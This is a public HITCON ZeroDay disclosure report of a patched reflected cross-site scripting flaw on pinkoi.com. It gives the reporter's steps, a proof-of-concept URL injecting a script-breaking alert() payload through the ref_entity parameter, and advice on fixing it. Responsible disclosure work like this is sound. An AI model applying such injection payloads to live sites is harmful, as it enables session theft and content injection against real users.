Pinkoi,Reflected Cross-Site Scripting - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2020-00531
  •  發信 Vendor: 香港商果翼科技股份有限公司台灣分公司
  • Title: Pinkoi,Reflected Cross-Site Scripting
  • Introduction: Reflected Cross-Site Scripting
  • 感謝函

處理狀態

目前狀態

公開
Last Update : 2020/08/11
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2020/06/27 01:14:48 : 新提交 (由 MksYi 更新此狀態)
  • 2020/06/27 01:17:19 : 新提交 (由 MksYi 更新此狀態)
  • 2020/06/27 09:35:21 : 新提交 (由 MksYi 更新此狀態)
  • 2020/06/28 00:57:50 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/06/29 20:05:32 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/06/29 20:05:32 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/06/29 20:05:32 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/06/30 16:39:22 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/06/30 16:39:22 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/06/30 16:39:22 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/08/05 11:19:49 : 已修補 (由 組織帳號 更新此狀態)
  • 2020/08/10 11:50:54 : 複測申請中 (由 組織帳號 更新此狀態)
  • 2020/08/10 15:27:26 : 確認已修補 (由 MksYi 更新此狀態)
  • 2020/08/10 16:36:10 : 公開 (由 組織帳號 更新此狀態)
  • 2020/08/11 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2020-00531
  • 通報者:MksYi (MksYi)
  • 風險:低
  • 類型:反射型跨站腳本攻擊 (Reflected Cross-Site Scripting)

參考資料

攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。

漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://www.pinkoi.com/browse/
https://www.pinkoi.com/product/

敘述

R-XSS

  1. 首先在享受購物的途中,發現奇怪的現象,選單中的連結點擊前後的連結不一致,中間多了一層跳轉。 
    https://www.pinkoi.com/product/product/GCdrYFSU?ref_browse_result_posn=1&ref_pgsz=600&ref_page=1&ref_sec=browse_result&ref_entity_id=root&ref_created=1593190234&ref_entity=browse_item_list&ref_pl_pgsz=20&ref_pgsess=1593190234&ref_posn=1&category=11&ref_itemlist=9nnyeNXv
=>
https://www.pinkoi.com/product/GCdrYFSU?category=11&ref_itemlist=9nnyeNXv

    圖片
    圖片

  2. 整理一下轉跳之前的連結,並針對其中一個參數進行識別化處理(ref_entity)。 
    https://www.pinkoi.com/browse
?cagetory=5
&material=58
&ref_created=1593189579
&ref_entity=AAAAAAAAAAAAAAAAAAAAAA
&ref_entity_id=GfGZgvDx
&ref_sec=basic_info
&subcategory=503
  3. 可以發現 ref_entity 的 AAAAAAA 被注入到一段 Script 之中。
    圖片
  4. 藉此可以構造 XSS 攻擊。 
    </script><script>alert(/XSS TEST/)</script>
https://www.pinkoi.com/browse
?cagetory=5
&material=58
&ref_created=1593189579
&ref_entity=</script><script>alert(/XSS TEST/)</script>
&ref_entity_id=GfGZgvDx
&ref_sec=basic_info
&subcategory=503
  5. 觸發 XSS 截圖
    圖片

修補建議

1. 針對所有可控參數進行 HTML Entity
2. 針對特殊符號進行過濾(; , > < } { ) ( / ... )

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;